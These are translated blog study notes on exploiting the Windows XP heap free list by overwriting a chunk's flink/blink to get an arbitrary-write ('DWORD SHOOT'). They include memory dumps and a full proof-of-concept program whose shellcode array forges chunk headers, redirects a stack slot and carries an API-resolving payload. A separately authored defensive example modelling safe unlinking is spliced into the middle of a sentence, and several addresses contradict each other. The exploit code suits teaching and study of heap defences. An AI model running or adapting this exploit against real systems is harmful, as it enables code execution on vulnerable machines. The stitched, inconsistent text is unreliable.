  • Using chunk resizing to attack the heap

    Just notes.

    Heap chunk study notes.

    DWORD SHOOT

    Environment used below: Windows XP SP3, VC6.0, Release build.

    #include <windows.h>
    
    int main()  
    {  
        HLOCAL h1 = 0, h2 = 0;  
        HANDLE hp;  
        hp = HeapCreate(0,0x1000,0x10000);  
        h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,0x10);  
    
        return 0;  
    }  


    On XP, the process of inserting a chunk into the free list goes as follows:

    After HeapCreate has executed:



    The list is first taken apart:


    Then the key part:




    At this point the key part of inserting the new chunk is finished.




    Summary:

    [new chunk->flink] = old chunk->flink

    [new chunk->blink] = old chunk->blink

    [old chunk->blink->flink] = new chunk

    [old chunk->blink] = new chunk


    In effect this creates a primitive that writes a fixed value to an arbitrary address: the DWORD SHOOT vulnerability.

    Below is what memory looks like in the normal case:
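    The pointer writes listed in the summary, and the two writes that later remove an entry from the list again, are what turn a corrupted flink/blink pair into DWORD SHOOT. The C program below is an added example and not code from the original post or from Windows: it is a constructed doubly-linked list with the same flink/blink fields, and the names unlink_unchecked, unlink_checked, build_list and the demo_* functions are mine. It shows the unchecked removal writing the flink value through an attacker-chosen blink, and the back-pointer check ("safe unlinking", which later Windows heaps apply) refusing the same corrupted entry without writing anything.

```c
#include <stddef.h>
#include <stdio.h>

/* Constructed model of a free-list entry: the two pointers that follow the
 * 8-byte chunk header in a free chunk. Not the real Windows structure. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Unchecked removal: whatever the chunk's flink/blink fields hold is trusted
 * as a pointer, so an overflow that rewrote them chooses both writes. */
static void unlink_unchecked(list_entry *e)
{
    e->blink->flink = e->flink;   /* *(blink + 0) = flink */
    e->flink->blink = e->blink;   /* *(flink + 4) = blink  (32-bit layout) */
}

/* Safe unlinking: both neighbours must point back at the entry, otherwise the
 * fields were tampered with and nothing is written. Returns 1 on success. */
static int unlink_checked(list_entry *e)
{
    if (e->flink->blink != e || e->blink->flink != e)
        return 0;
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    return 1;
}

/* One-entry circular list: head <-> chunk <-> head. */
static void build_list(list_entry *head, list_entry *chunk)
{
    head->flink = chunk;  head->blink = chunk;
    chunk->flink = head;  chunk->blink = head;
}

/* Intact list: the checked unlink succeeds and the head ends up empty. */
int demo_valid_list_unlinks(void)
{
    list_entry head, chunk;
    build_list(&head, &chunk);
    return unlink_checked(&chunk) == 1 && head.flink == &head && head.blink == &head;
}

/* Corrupted entry, unchecked unlink. `frame` is a constructed stand-in for a
 * stack frame whose flink field plays the saved return address; `landing`
 * stands for the heap address the attacker wants written there.
 * Returns 1 if the "return address" slot now holds &landing. */
int demo_unchecked_unlink_writes_anywhere(void)
{
    list_entry head, chunk, landing, frame;
    build_list(&head, &chunk);
    frame.flink = NULL;  frame.blink = NULL;
    landing.flink = NULL;  landing.blink = NULL;
    chunk.flink = &landing;   /* value to be written   (the page: a heap address) */
    chunk.blink = &frame;     /* where it gets written (the page: a stack address) */
    unlink_unchecked(&chunk);
    /* write #1 hit the frame, write #2 hit the landing area */
    return frame.flink == &landing && landing.blink == &frame;
}

/* Same corrupted entry, checked unlink: refused, frame and landing untouched. */
int demo_checked_unlink_rejects_corruption(void)
{
    list_entry head, chunk, landing, frame;
    int ok;
    build_list(&head, &chunk);
    frame.flink = NULL;  frame.blink = NULL;
    landing.flink = NULL;  landing.blink = NULL;
    chunk.flink = &landing;
    chunk.blink = &frame;
    ok = unlink_checked(&chunk);
    return ok == 0 && frame.flink == NULL && landing.blink == NULL;
}

int main(void)
{
    printf("valid list unlinks:       %d\n", demo_valid_list_unlinks());
    printf("unchecked unlink writes:  %d\n", demo_unchecked_unlink_writes_anywhere());
    printf("checked unlink rejects:   %d\n", demo_checked_unlink_rejects_corruption());
    return 0;
}
```

    The check in unlink_checked costs two loads and two compares per unlink; it does not stop the overflow itself, but it turns the corrupted entry into a detectable inconsistency instead of a write to an address of the attacker's choosing.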

    003A0688  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A0698  2D 01 03 00 00 10 00 00 78 01 3A 00 78 01 3A 00  -....x:.x:.
    003A06A8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

    003A0688  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A0698  03 00 03 00 8F 01 08 00 00 00 00 00 00 00 00 00  ..?.........
    003A06A8  00 00 00 00 00 00 00 00 2A 01 03 00 00 10 00 00  ........*....
    003A06B8  78 01 3A 00 78 01 3A 00 00 00 00 00 00 00 00 00  x:.x:.........
    003A06C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

    Set this up here, before the second allocation!!!!

    [0x003a06b8]     = 0x003a06eb
    [0x003a0638+4]   = 0x0012ffe4
    [0x0012ffe4]     = 0x003a06b8
    [0x003a06eb+4]   = 0x003906b8

    003A0688  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
    003A0698  10 01 10 00 99 99 99 99 EB 06 3A 00 EB 06 3A 00  .櫃櫃?:.?:.
    003A06A8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
    003A06B8  90 90 90 90 90 90 90 90 EB 31 90 90 90 90 90 90  悙悙悙悙?悙悙悙
    003A06C8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
    003A06D8  90 90 90 90 90 90 90 90 90 90 90 11 01 10 00 99  悙悙悙悙悙?.
    003A06E8  99 99 99 8C 06 3A 00 E4 FF 12 00



    003A06B8   /EB 06           jmp X003A06C0
    003A06BA   |3A00            cmp al,byte ptr ds:[eax]
    003A06BC   |E4 FF           in al,0xFF
    003A06BE   |1200            adc al,byte ptr ds:[eax]
    003A06C0   EB 31           jmp X003A06F3             // this EB 31 is the jump we placed on purpose
    

    #include <stdio.h>
    #include <string.h>
    #include <windows.h>

    char shellcode[]=
        /* 16 NOPs: user data of the first chunk */
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        /* fake header written over the following free chunk */
        "\x10\x01\x10\x00\x99\x99\x99\x99"
        /* its FLINK / BLINK, both pointing at the fake entry at 0x003A06EB */
        "\xEB\x06\x3a\x00\xEB\x06\x3a\x00"
        /* NOP padding */
        "\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        /* EB 31: the jump at 0x003A06C0 that lands on 0x003A06F3 */
        "\xEB\x31\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        /* fake entry at 0x003A06E3: header, FLINK into the NOP sled, BLINK to the stack slot */
        "\x11\x01\x10\x00\x99\x99\x99\x99\x8C\x06\x3a\x00\xb4\xFF\x12\x00"
        "\x90\x90\x90\x90"
        /* payload */
        "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
        "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
        "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
        "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
        "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
        "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
        "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
        "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
        "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
        "\x53"
        "\x68\x64\x61\x30\x23"
        "\x68\x23\x50\x61\x6E"
        "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8";

    int main()
    {
        HLOCAL h1,h2;
        HANDLE hp;
        int zero=0;
        hp = HeapCreate(0,0x1000,0x10000);
    //  __asm int 3
        h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
        memcpy(h1,shellcode,300);                   /* overflow the 16-byte chunk into the free chunk after it */
        h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);     /* the second allocation performs the list operations */
        zero=1/zero;
        printf("%d",zero);
        return 0;
    }










  • Original post: https://www.cnblogs.com/zcc1414/p/3982381.html